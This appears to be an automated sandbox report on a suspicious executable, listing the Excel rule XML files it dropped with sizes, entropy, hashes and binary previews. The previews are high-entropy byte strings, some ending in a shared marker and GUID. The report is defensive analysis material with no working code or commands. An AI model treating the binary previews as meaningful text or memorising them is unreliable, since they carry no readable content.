                                                                                                                                      Preview:<?xml.U..|...`..1....E..1."..A{o../!.............y\.Cl.%N.QJXE.,s.)r..`)...y.g.Qx..d...j..k.O.C.......R8...>4..r.Y...x...*....w..0...6..N..z.0.....d....TCKJ..a..CX..?M6.0?.8.I..)...V..WD..#..^...&....GR+.Ej.Q.=..i....(.g.._.H.`......s...<.S....?....X...:.I....^j.V..X..I@..)>/.:.f.u.....\O...A..+...p.;....H.OW...F...F.d...E+a0....w.Rct.[].L...A<. ...'b...<(...d.".]..4.M..03....M.n\.z.`..x..."J=......',....|~...R...~.....f..;A$E......c.Yxd.....R...9.Tb.....K4..S..*...............!....tM7X.;....C^+.7...dC..'E..F......-.%qO.D.#O....|._.~.f.D.....FeV...(U....e`.={.B2O.<l......g@|.Wd.1\0...U..c_....@....?;...f .......+....Y.L[.-[c.ko.ym'........qw.....6_.8uk.1..w3.w.....7..e.q...P,..Le1YL.k....Fk".D.......|.:5q...a...$._b=6o.E..j..MQSa...kg....!Nz...\*._..w...RY.*.......d.`[.....?-9...d).{-?..T\..;^...E.'.?SB0iH..L...i..=.67..OS.[#.,.:Y..r..&.p."..~HZ..jq.-A.....7E ..viM.Bpj3.,....oS5/..e.7.1.%..?..33=..8N...._p.......t.=..F=.q

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180159v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1638
                                                                                                                                      Entropy (8bit):7.861335376548882
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:BdnBWrWRbTsyGIaYW1tMZuEee0CvUClcD:BzWrOTDGIatS8mTlY
                                                                                                                                      MD5:E063288FD96E905940D9A019470D7357
                                                                                                                                      SHA1:28230A0B54FA6DC371EBF0FD52066467E09DC3BE
                                                                                                                                      SHA-256:7890AA00A0A67FB831E31E280AC394A8F93EC84A2A924BAD0644BCDA337530BB
                                                                                                                                      SHA-512:7089F4760E7A50584F4C76D28006BC390A82C2349DECEA8297E76F6846F7F9DB6BDC7D601E9AE1CCE0912F319812EE79ECB8E4EB6DBEE856E5A51C6D5BDEBA52
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.".1....U....Q`.=qo.K..ZW.U......H#.*./D.=..nS..Rh-..]c..Q...n....'.)>..<.zj.B*.'9..f.....&..);.B..J......m...,..P}....T.y.{TZ....6...<.........nDS-.s....,.iV..4k.....<U.TM.3.....z....Z......hz.|C.......>9..Z...E...i_4J.E9.my1{.5<...]..i.........v.v?.[.|Q.+.....}.......vq{|9.&4..Z.h?NX.3..`.@....cWe..#w.U...x.....5.SF$H.b.c.T.:..id..._+....d.,.%9);_........\...<'.A.7#..}..s.q.....&\.$.d.)..FU.GQ2.t.;....+..%............T;#...^...%..W,.w.P.g...m..C.K..V..Z.b..3...K.U....P8_.g!.Cw.i....S|9>..d/..H.\5r.t..........!..{.gH..u...+..-.}.f.ru[.)0\.I.........=...#.I6..L.9|.Z.We=.t.'.Q...*t..i[..*8...u=.....uxv..<......0.i.O....>e.C...,H......G<N ....|..\xM7.i.`.a...@z..t.l...........rC..2..h+.d2......Sy'.f.F.OcM...s.y..9..L:.t..G2..HPPY'.]U.q......SP.Qe..DJ...?.5z..I..&P.~...2.....AkB[.H%(&f...fb4(...a.v..Ft.7..g...f.?..&..EB$..N/..}....{..t\...u..tR..Y...R.)h....d...<....$<6[Z.....k..q..=7xG9'......0...T...........QU$.+.%.e

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180160v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1521
                                                                                                                                      Entropy (8bit):7.857517016923565
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ktwnj9v7WoLlXB2M3kETPLDfbzscnl7kH8CDOP5M/nkSNhwS4iHCVT/aAzYxUybD:ktwjhWoLlXxTLrM47kH/Oo/ES7gSOgD
                                                                                                                                      MD5:0FF3AE3DFF015003CEA27A134B675BD4
                                                                                                                                      SHA1:6AB837E4DE8D9975F4324B9F89699ACC40F1D808
                                                                                                                                      SHA-256:420F1F4A602C2F7AE4EB0C957B20FAE254675DF02284CC9E62953878D12C5C15
                                                                                                                                      SHA-512:BEC00E3BC80ED1EAF34152A64B8E8E268EA75A77389949F0F6DC615F4AA9B9934701F27931A2C1CB9A000C0477D28E3D9585F6068FD6D445CD371585490CB530
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.){5;*b.Q.60......F....<......G.<P....#..u...i.7.l.,).wOc..n...H..3pBX.T..K...,......S....[.|u<.4.`.^..|9..#..3.EI)X....^."...Jh.G..i.....L.....<Fv.~..l..B..?.LD..?...h....X......bE...,X....>P.....pZ...V..}.].Fp{.`\,S.A./...9r/.......(..2._.W.u....9?o...]).P..s....!.W<..V. HP...n'.i..u.@.v.vGMN...._...|...!.|..6`@...].....A.L ...#..I...@.Q.N.ZT.pV.....[+.0`.Y._...Qs.....W...W.[.Y.........P9...C.4nR2...H.O%/^...eX_._.....`..a...J..h..3{.K.V.e$...6..p.Yc.g...n..4....f..g...Z%.....N..z.O.B...*.-.y.s\..^.N.6....t..y...5..C...DP....N.y.f.M6.T..ycP.%.{......tpE....x._..1..a...........R5.D...1.,..E.HC.V.N...4L....g.mJ...p.Q....)..\tliGb....$..du...n.XP........+......[k.[....x.s.....4a..:.]..U...Z...P...V.i.I.5..0k.[j3#...~...C.#.."..Ea&R....;...B.w`.Fi.U.K,.{N....Fb.....!;..h.;R.[0=.C.9S...B...v..C.|...../.(c".3.n..t...m..0/[.D.....T.e..0U...Yt1[U........w?_).8....". ...%H...0.Z...x..........C..3#/..ni..Y...~V}V....=b.p../...PI.i.......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180161v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1975
                                                                                                                                      Entropy (8bit):7.900725278941443
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:lF72qiVyLRMgmh/xLKLZYVCbhf6tEiSaI1Pt+XGUiat9/paLKGD:vVLRMgK9KtbraIR4XGa/KKe
                                                                                                                                      MD5:08E465B972BD9BED1BE52FEE67A573DC
                                                                                                                                      SHA1:388218657A142BCE82D55D21777C40962D6B84AF
                                                                                                                                      SHA-256:A7F8D35D7C616F2DFC3A5494CC8C9F8BD8E1781BF1CA12A8AC1EEDC1872D352B
                                                                                                                                      SHA-512:402F71DF96C2C9AA7051BA1E9A6D7627F08D59A57DB981CFA6037EEA870CF7D9F47381F3DD814A846DF535EBE6EB3F006009F8CA2B06F37C70B0300C393D9CAF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..R.....e...Z....LR....!..1=n...A=..0.$....je..{i....H.IQ.X..Izu..6.;j..B..7@.u8.../4 .X...7.....R.ce .........]..p:L.fk...g.f..7.9J..,[..i.Y.*.......}D...&S..&...<8...P.Q..%...x;.v.F.b....xt..Ix.1tT.i..L...:...`.\+.7.u.....b$P.Y....s..P...v...c..(.......#..nF..g\8...X...R.X kR. .;.^.N5.1.@.!Z.w4.r..../....Nm......%...3.wH.b^.U.J.....t$w..].=.....V.k^2.X1%.....Ii....'US....9...4.Q3..q.3..:EV/.......&...~...:.h.S.Ni.PE;....,^h....zss.....VGc..1..Xq...4..\U...............I...>.."..M..2....^(...N3.#..C.#..a...?.W.D'|.h.M...+.....Kd..U..$LT..9...^...A^e....`c.'%.....^..Z..suk...c.i.....".`..a...).A$.b^....]..V...HVTtO..2.....Y..E...k..j......3..'..+..\o8.{.>...~a.PXo..o.<.. .L.I...8...6.$.|[.h... ...-...^......o..aAB..!..,.4z..h..H.+2... .7.V~mPo......K-.g...`..O.T..|...1....&.~s.h..Q..j.N.....Yh`...<R=.?.F.J.U./..M.9.PB.'.L..r.L.....Oc..../O}e..+.x...B..^`....8.(3R...V......QS!..\)..j....&.#V.U6Yq...{+....5...X,.b2.6.u.B.....G.m........._.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180162v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1639
                                                                                                                                      Entropy (8bit):7.88907623253694
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:J6CWuqhFDaZDJZvkkbpntvnQ0lLXy8ijhrhBVTD:flqKJ9rbDnQ4C8C7
                                                                                                                                      MD5:31156A340C579B459CEDB121DD1257E3
                                                                                                                                      SHA1:7703726231B734812C112D0925557BA02D19AE69
                                                                                                                                      SHA-256:DDF9C44E7AB08E4475BE6B11368359CC9D31023EEF9C09EA8048195CDF180B7C
                                                                                                                                      SHA-512:777D6D0060A7CDFBB13E98876BCB87551E03977538BEF6F39B49E3374A4E8A4D1CCB0ABCB99ECA738D7610DAFB6C90A4D0CD569EF52081EFA3CD21691BCA11C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml@i3..Yu.(...rcF.....v.;.J.....}.A'7s4...lP.....1.$}F...H...JR..o..{..,...<"...F=b..&pr....2...tP....b[..U..&G.$%4..E;..u.L.;..UVk.f&..L...J-!...Qs....,$.......S.1.K...s .o/....$yC...T.P2...>.a..........w.c..R.!.xw...Y..m>..J..f.......}.k.`..U.k.H o&..2]...+..+........g.u.JEC9.......g.kR-.e..o..F|...s..2...0...........Y..Z...*9t.w......v7.7...b7....-..B.6K*..e.....S..\jW..Jk..8o..\..F.v[....}$!..z...L.=.6.._...Wb`.A.......0...O.....j.`P..V&...)....B.<K..;.}B...&...m..+6a...<..@+.>[J..;.f....I...WD..fD.O%{..U(Kk.9}..~....K.s.. .IRH.m"..\]6..H.......a.*`...#...9...&.(CjC....%0W&....^..vu.Yp...ZA........$...,o\ .i{p...8.*.R..qF_.]*OB>..o.H.)..#."......}i"O.v.+.....%......%...P"w.,uu .U..P{...gpX.....{.!...B......} .&!.?....{.!f..=....3qV.(.,.).LG...%&)'.e..?...z.4}..3/.Ur.m..K.._.I..m..'..B.K...A`Bp.Ok5.M.......bz.hLZ. ....J.W.....Z..Q}.^KM?@<n.#...AK....~.8.q#p7.@.w.)H.A $Y9......gc3..r.k.?...'.E.gM.J]..:.fV.Y)......7.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180163v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):714
                                                                                                                                      Entropy (8bit):7.662246549053769
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:E/ILZBA39/6+WWXLPsyALQYhCpj28t8PRj8BsE6sOSRoBj1EcgLbZukIcii9a:WILbktWUQy6hCp68mOMsOhB5EcgLCbD
                                                                                                                                      MD5:322D5CC2F94176895B70986E3119AC7B
                                                                                                                                      SHA1:2AD03DCF534338156FD6F044F282A760E6A040C6
                                                                                                                                      SHA-256:373D6AEDB655FE027F2984A614BBFB66819B8A95A478458490A72923E8E6F76C
                                                                                                                                      SHA-512:F9E109CF566659AD6B22F5F61293676D19FDA3BB6CF3EA768A506EA05E5C5F52CA080A9027137E42542568E4DDCCC44BDBE439DB4DBCE0340217B1A972AD3F77
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.H...y%.i...6=..3..u.......H....19.2....k.8....p..:.>k..>.".2Fu_n`....U.$.R..a..F....g2}..........f.gL.]..NH....*N[..9......w...(...)..s$q.7s....s,.[W6.mS.I..J..C..c.W.$..+.P....m....Q..w8...A....4B.8.6rr.`......z....].f.E@*...<X.NA.,%..Q4p..c.. .G.;=...1.z...._^2..W..$_pX........(. .)X.....{M..G.N...........U..q..)^.=..w;....^pc...k.?....9.bP}.r...f&.5:'.} Bj....@G..J........Wb..=..D....`g..%......F...=......-.H..Q[.]...uS.......T..o....)U.. M).+l..t.....m....)8..tG......Rk^iVj..w!3...!.M.....R...yKN.Ez......f..Gf.......PS.=...F0,....O..-...{}..;A.!.?6.s.Gm.Q....U..X.A>...f{....F.'.mP...FK.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180177v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1719
                                                                                                                                      Entropy (8bit):7.882160210963931
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:FQgAfP/yiT7lwDif89bt+9nXuGehLBH55iVvjdHleID:FxQyqlwDiu8teTH4Lv5
                                                                                                                                      MD5:8EC597C95DD2A71565DABE0A99C9FADF
                                                                                                                                      SHA1:020825B38BB638CB9CFED976398D07A051EAC578
                                                                                                                                      SHA-256:18DE19F6348AF7123D965917B80A038323FDB8953BD7E8F5C66E43EC3A27E3C8
                                                                                                                                      SHA-512:48BB681411B3771E6DD10FD93BBB1B15C08289B17CE93382F92D519F5C2FBBD558655F2445446B2356B0C904AA4AC7C1071324D348B5BDEC321B5F96784C0C1D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...dS&........d.W..u?.<cm.g....lT..NiP....._...**.o2j.?..E.#.J...K.Vl.P.._/.C..0.b...&..E<.u.si[..N,.2q.......w.u:+.9.b.'p'......<.....!"..N.....c...1.5.}..C..&.T.....J.,p..^...=NZ46.>=.HRY...[.Ie..1.a....[.........(...h4.../P..z#...7...H.Q..T.g...Dp+.../.Il.{...{d..v./..........QL.."..]..uB]...FT..1...1....$....*@...#...............>.q..&.x..Rt.p"...w..j.....7....+.z.Xf@.;g.O7..-.0,R9.[.Ks..=..PC......h..b.FP...;.#{>...oN}...+:.A...=....1...F..JnUgF...F..D..........5..m_.Xn..w..,...Zl..[Zr..{5..(.+......DD...Z\&P..A....S~..W.b.=....b..+......4.........4..}q..8...C.g..0.......$.o....E..........H...@..3.Um.$...-..o...Uj..W*...2.U.....!..pvB.$..g.:G......6.z.3.....l...x..9.u|>US.;....K..a....n.*.cX.... qx..b.~.:.m...[ .Z..t..=U.).....}..B......D.".f...,....T.G+..@.T.9..h.....w..Z..3..W...m.C.1Q......2u....3....'W.MY..s}.SM.bB?......au...T..bA....5..y..5=S$.T.!x.~.*...-.r.s.h.PRQ....=.H.B!.i'2}....=v.....E.=-.c.f.vW.'A1..1.>..65..eJ..>.u.{

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180178v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1251
                                                                                                                                      Entropy (8bit):7.831513515378107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8Cw9XFGTJUbkaSbS0UtJ9MwH8JxmtPTb2oSrdZGoBa18OV/tSiP3MbD:8C2XFG1AkaSbI9/H8JA2ZrdZjB08OV/+
                                                                                                                                      MD5:D4B8960C5E4D4054EB1F2267C2F8813B
                                                                                                                                      SHA1:9E4E1B6FB198BCD67FBBA1522CCA33D2753C8F1A
                                                                                                                                      SHA-256:10723BA4044E05896D3111CAAAC76A8DED9DC4D8C2F6B3ED0108DDDA6A620FDD
                                                                                                                                      SHA-512:EF9FD035494F5DB1F59462895864A4FC0BF464D167E6CBEBACCA1D7F802A57A51EFC89511BE4370C8FF2CB165AC611161A6F36AAD82D8807688303C51872799C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....v.8<..B...Y._...W..]<$vt!.R.....g#..H..U.5Z..h".b.y...M....e.....!....Ah..o.CoWY.6..d4..../4..N?%PwzN.+..T.N.UF.../...Ve...c\'.....*|.L......^.r.-...Qh..._.5.t-h.).P8W..Qh...@....j~..1>.0.....!...[,.......O.J..wc.}..)T..V.....B.......4.I}.qd.{..f.n...'...\.P1K....h.K.K.|H.6..C......}R....s.c.:E............G......].&...........F.i..I,k.xfG$...o..@..).q.......B....Q|me!_.).2.qh........1..&...........f..b$.I..g.6.,........]....@h.....t-...}h[1...g.........\.. ..*tB.........z.B.....g<...........Z..;...=...,.* ......<.....(.....+.3.9.O..A....(....sG..0'..8....[..!.{{...0K"..G.x.y'.%.....f2.E..;.f...D.....k.Q0.Y......O...x+.V....M6.6.*...+.Y.8..(iO......~OH.FM...]n!.~.q.;...H.....t...}.WDo4..."+y....yTq|..@o.w..d.....G......y...zzU..`2.s%.K....&....D...'LE#.&...q.s.YO...V^..2...ym.Q.^r.....L.~.>d..7@....*.........y3...=.....DG5.@.......QO.......m..mF.Z.N.k>>>.}..._)...Qo..0....|..1.g......B.Y.w.R....Wd..8.X........2b.~...6....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180181v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4490
                                                                                                                                      Entropy (8bit):7.952659112836127
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:dcCKgL65UwfOoWDB03BZX9DApsq+AKb7tgrD59fb:dchgL65UwfOoW907X9aZrD5Vb
                                                                                                                                      MD5:4C6C429D7431C1811574A9B017B994D7
                                                                                                                                      SHA1:E7AD444371D9184EE17C3D52B471A545E8717481
                                                                                                                                      SHA-256:61D3F798A8EEE83CAC63CE480125F3CAB68790E68AF2B0A0CEDE9F60C9323588
                                                                                                                                      SHA-512:1CF2CA07D74AC3588A09F1DCE83B62D4050F08B574EA50332880661DCDC9CB5BA2C8C2622B179BAEB3612E5DF259DF4C0A659623F6CF1BC242F8C670F5B35EAF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...Z.5.74.SW..Sdi.oZX...:.>Z3.q0pS....x.J8..\{O..LO.a.......m.<....[z..a^.T\J.`.-4{..cEr...QW....>..O.....$.1T+.3.l.:...r.........'..V;.w..Z>..%3.I.....k..[.\.....}..6.)j..^Q-]pw.6.......M....N..8...i.g../}..y,..J..n..5..3Y......;...S.....Jv.....*....8........qs..!....=3gkn0.K..b.u.T..S..}..(M....O.^{.......J<...?.g.....s.7......EH....z.OXc.."hhHq...3.....H}*r.....'..&;..*)I.-|-7.{.oQ-].......=..P.q........e.i...Q.'...^..@..d.m...$y.W0a...X.1....No.......!.#.G..:<.........2.p..,>x..Aba:%...`m.mw...g............Y..q.....+....*<.o..3.........,b8S+....IWh.9.K3..|M...uB&..(.h.v...>iXV-:..C......G.8.hG.?..Ts..Y..e.u..$......%. .k.F..K.JP.id..2.c...,7..tp...1..%...&.....t.=....[.Iu.S>..j.p.._..E.L..q].F..YS;0...;..).U...|-....j.+.4D~.v7).Q..g;h...x..,...uej..%.]...t,`5a..;i..3...T..5..SM[.|I....,..:H....<...Jm..&.O .<O.t.......5R.@.V.h...b...~....8..Cg.D.|..G.nhc}..R...U....0..|..)Hz....ngd..z.P^.b.T......M.}}.7oG....%.c..1A.K.y...y...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180182v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2316
                                                                                                                                      Entropy (8bit):7.904308416954279
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:B9ZWTyI4cP0Wsmy/qJ/LKQJWrrayBJ7wdSTAmPOvL8ph1P/D:NcyICUDrwJwdaAJA1Pr
                                                                                                                                      MD5:317E8FA02FAB0A9E63816129EC1A5F21
                                                                                                                                      SHA1:6722EE164FD4B13B43F20D58EA82E3AF51324FDB
                                                                                                                                      SHA-256:921FDB8DBC782A4EEF4505C16EF72AE6F2FD444CE4F3B2CB209A7E00F2A78460
                                                                                                                                      SHA-512:6844507FA0B9F7AFDAA216B8CD22C659B7B91C2B9DB67E78F6DD2FBE1C4BB8B5C0D90A34433D18BF2633038D9EC787A972D169581B497131D851628D5B7AF5BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.ld.MH.Y)....,By.o..[...n.Qv0..C.(...P".Z..P.G..sR....z=..L..G. .i.2.%v..-.Q,. k'GD.o>q..P4C..6.d..5.p.G.....q...;.M~..X.xh.G]5g 6.....4Z@.t.hK..+2..w!./.SP....s..@.N.^a.E..)L...hQ~..`FUm..M.\0...q...&....*.g..HYC.........>.9..5..I.U.:`\.....i.Y..1...r..P.v.......e1.I.e..j&=~.../`...R.,.j.Y.k|..j..L...O...L.J...5r`..v.&/n..;p."..S...Lzt.".TZ...b2y.[^.m...`..&...aH......wc...C=.....Z...>.J..1...}n..J~....w.U.mj\."%..c.!....Q4.....R.@:..R..U.l.%p&0N6..h........}....p..xK....g..\.eJ....Wh.b.kc....;...R?....<...t]FW...P.."....B..<I....0...K.N/..rBl.l..f...fI....J...C..Y%O..fP....7*3<.@X.zQ....-.......%a.7...."..m..B..-r..6.....R.A.. ...-..Y.).nt._.....[..G>I..ZK..o..b!. .h.p..q.m..E..^=R. B..^...9._[G..tOl$....J.....O.iK..Y\..58v...O.......*;!s.M.C.'..m.....`....6....4}..g.=...P.5.^.'.".............H....>..r[9H,..-...r...,.ab...A..2.B.z.7.....(._.71...p.)....6.p)Lz...I..k%M.n.I..;2....A.....05l.&j....f.z.yC&.4.{...uK.R...5... R(....LK.ar?.....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180183v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2395
                                                                                                                                      Entropy (8bit):7.921559825058594
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rbUAC4mRoIx1ZEJknNKQHpNh03T4OkIc4KhSu6coYPcjtGkM/7ynD:rQ7lhxESnLjq8O1JySuJRgMLTyD
                                                                                                                                      MD5:F716D56B77B1910841BFDEA472E9F7E1
                                                                                                                                      SHA1:12A4F71D46F0FC8321B200683AEC00261D7D5C4B
                                                                                                                                      SHA-256:312C2CBBBF8EDC888D2E3A77962E3C1F3E2E61F8D39BA1974E13762EDA4CEA71
                                                                                                                                      SHA-512:9B21BABC243CB96D148705FAE9D5C71A5D7C92AAD7CA9E219F832B65E87F481EDF6C1D716887CD96BD58E6E10CECAB27745CFF775E876018E264EAE2E053186F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....J].(./W..>....;..r...8$ !i4.........m.$..nG8...L..p...i5_r\.=...Y..0..WrA..!..B..t?].E..1.e/....vk.M.kW.=.`:.oA..|b.?..z.h....@/.A.....{U.1......r)=.?"...z.....rE.C.,.:...."m3..A......d.b}.#..|..;...f......s3..z..s'p.y....$.R.".$...-..!V.....E...$..{.5..m:.......QX..g.T.....%.}.&H...sS...l...U...7..].*OA.Ne...z...X.%a.D5.gA.o..{...!xr......F..)...Q.%.J...N.$.e....aR.g......;...j........A..|....Qf.~.$E........H.?..{.k<.......r5.$OlfPY1Fa.p.........(...BAOW..u.}...D..7(y.#...W.....W[.....P.A.......u.oS......K>_%}5..O.U...itZ.43.s....]..ya..E.X.H...-4.#Y.......oF.....1{.@.AO..&.....#..s..>.."m.....u...k3..]KVX.j[...Ok...K7..=..#..=..|.D....S...q0b._q.....|b|.....O.N.".S..8ui...f...AQ.(.....{.....a.|..S...KJzZ.P{..o*...1....f(..J...M..=...........>.3.Y._h..;(.Z..E....#.4CZ.${(.$.n.(..V..#...u.u..,...IS..<..YH....Rxb..>#.v.xFxV2(..O.K..n6.v..''.@..8.X.V._,..8........m...u..r.I...[.0tQ.qeC.W..e....P.v$.+...........d.~........z./.c.g9.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180195v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1591
                                                                                                                                      Entropy (8bit):7.869551992403565
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:uLDY4zyMzsy0qPHZazQYtHQJrqi/4TK4D:uY4zyZy1PHZazTtHerD4TKk
                                                                                                                                      MD5:897B09D75F271913C23EF0DC82716B11
                                                                                                                                      SHA1:8271E7C631EDA2A130D5E2AAC6FD08EB6E9BDBDB
                                                                                                                                      SHA-256:ABEB34BE8CB93BDDBEE4ED462A19ABD0F97DDD6392F43308391ED9A31D942CD8
                                                                                                                                      SHA-512:F0DCA9FB6CD46C9D8E686E8CBB05F8E2C29B0F0EEB64C4EB2728A10AFE9ECE2DAC7D7A8C4D7450940B1E379B77C71EF2740B6130440044B59428B592726443DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmli.>.8P2.&...e.N.....W..sab....Zl.O...J.~....n.0"v.:....K...7.?..v...2..."=sp.:...S...l.....t...M..Y...F.J.b..V..`*.,A.u.......0..'.t.......}...i.&X...1.O......S..J......::qsy..Q.#..a...8.r2....%.P...z.3.._V.Z.V.T..&....N`*..Z....".ze........j.m@5.*..x.g....J-..(....+E.7.....+..^..R'.M...8..].....u..`O.D.*....8.@...f.IDS.^..6`..yOG.k.NyJ.!..yY/..&..x.......}....z...R.J..cyxy.6s..O.J[V..wH..k..=~.=...{.!.....a.g....2z4.H.....*.zP.H.L..$@!R=x....9..s...,R.d>8g.1:gc.7.p...........u...\.,.M.4.0...t.4...*r...*.8 ..dy../.f.>2..]*..].pGC..7.{](..g.N...Q....Q.....|Ycy...@j$.P.4.......Y"..;..$.8.......%.+....$..l.j.v.\.....;...[...]..%O.....c 4=.V...Fr^..u.>C3.x...._.f,<.@t...=.u.z..hLh.....Kc...?.2....;.L:x.ukt..:...uU..0<.m.cAU.[P. j....i...uXQ..NO.iU!%...P_.y..g.c:.....M.g../..*.^z...^..PB.y.g.v.Rz.b.u.%F..R( ..uf........_....;/".%.1Q..._...fB9..R..r.\........G..../<D..upx.....\{:U.. #...Z..0.:d....i.........O../wL.....81.......aThxS..+(&..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180200v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1013
                                                                                                                                      Entropy (8bit):7.811383914239725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Cy11TfGhSW3RjSpAwsgNfkf216sg8XGXbD:Cyr+kWlSfTNf22bgzD
                                                                                                                                      MD5:A05B7367DB0024CB8390F56156EF93D5
                                                                                                                                      SHA1:F36955B68E86A37BC006845213AF958D0A799A4A
                                                                                                                                      SHA-256:17307F3D0B8D3367E437480668CE484F1F31FA98A47342370BD7D57338131316
                                                                                                                                      SHA-512:14EAC9BF30C27944958383E0B69FF9077E89BABA18E0E4DD0B45AD3DB8616B82A39A9F4438A15561F542D6836F92AA296918F6775EB590E8DE95F4783CF4109F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml^...r.*.8..3...?F..q.6js........0P..-j..L>yH,.R.V..L.......2XQj.*.E.1.v..P"..p.?4e.Vx..$j._f<.......'J.Y.0..f.{......Gn.+..bl.a~.S.5.@ESw+i(s.,...=.u.D.B .......f....1...7.kc..........S..C....[-+...c.H..A.\.}2..g[T.\.H:.. n;,[.GE......P].|F...f...u..ds.8..F......(.e^....d@..}.]....z..TC2&.P]Eb...d.+..C.Z.(D.d....D...=.........UXb..K.vr...+}g.cv..Q.'..V..:. d.....L#-o....&.....o..R\P..H.I<}...I.....8..8.)..p..p:..CW..}.l..r.(s..~.CR.....9*w.,....}[...|w...~ca.........k8..w..{..R........:k.)..=.....F...):.z !.....E...#......9.7...wg...I.0....$.PO..\...Q+Y....R.-.O.......X^.~2.x/M...z..A~..?..z.Y]......h...J.x=..X.y..#..Vr.Q..E....2gu....U~...g.?.[..Nm..p..]%..I..\..g..b..#..d....v..l...m..p@..S{.....p..@_.&JZ.0.j'.(4...{V......[Q...s...m......VN.B...r..oX...9..m..M.. f..X...........L....Jfu...\.u..n0.........j.g.".Y.K.TP...6.Z^....*.....z.........o:m.p.i`X......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180202v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):704
